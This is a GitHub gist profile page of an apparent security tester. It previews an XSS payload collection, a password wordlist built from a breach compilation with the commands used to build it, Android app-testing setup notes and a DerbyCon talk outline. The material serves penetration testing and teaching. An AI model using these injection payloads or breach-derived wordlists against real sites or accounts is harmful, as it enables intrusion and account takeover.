Skip to content

Instantly share code, notes, and snippets.

Bill Sempf sempf

Block or report user

Report or block sempf

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@sempf
sempf / breachcompilation.txt
Created Dec 22, 2017 — forked from scottlinux/breachcompilation.txt
1.4 billion password breach compilation wordlist
View breachcompilation.txt
wordlist created from original 41G stash via:
grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt
Then, compressed with:
7z a breachcompilation.txt.7z breachcompilation.txt
Size:
@sempf
sempf / gist:f44714afe0050b83b6e647261d53b43e
Created Apr 4, 2017
666 XSS Vectors collected from the web
View gist:f44714afe0050b83b6e647261d53b43e
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@sempf
sempf / gist:c43eeeb0fa6f6a9c19e62d808301c273
Created Apr 3, 2017
How to configure a new testing Android device in Genymotion.
View gist:c43eeeb0fa6f6a9c19e62d808301c273
Get Genymotion from https://www.genymotion.com/
Pay for it. For crying out loud.
OK, now set up a device one version of Android behind, and using a Google image.
Start it.
Click OK on the AAPT not found.
After it boots, we need the Google apps. What you thought Android was open source? HAHAHAHAHAHA.
First, we need ARM translation.
Search for "genymotion arm translation download" and pick the least eggregious download site. Make sure you are wearing a digital condom.
Now the apps.
Open http://opengapps.org/
@sempf
sempf / gist:e3645da8abeae04bd8cdae6390353750
Created Sep 28, 2016
DerbyCon 2016 presentation - Breaking Android Apps for Fun and Profit
View gist:e3645da8abeae04bd8cdae6390353750
What I'm talking about
• Intro
• Mobile Top 10
• Set up a test Gmail account
• Connect it to Facebook, Twitter, Linkedin if you can.
Local test environment
• Genymotion
○ Required VirtualBox
View keybase.md

Keybase proof

I hereby claim:

  • I am sempf on github.
  • I am sempf (https://keybase.io/sempf) on keybase.
  • I have a public key whose fingerprint is 47A9 74E1 8C28 B419 A092 791F A628 D30E 5565 EC89

To claim this, I am signing this object:

You can’t perform that action at this time.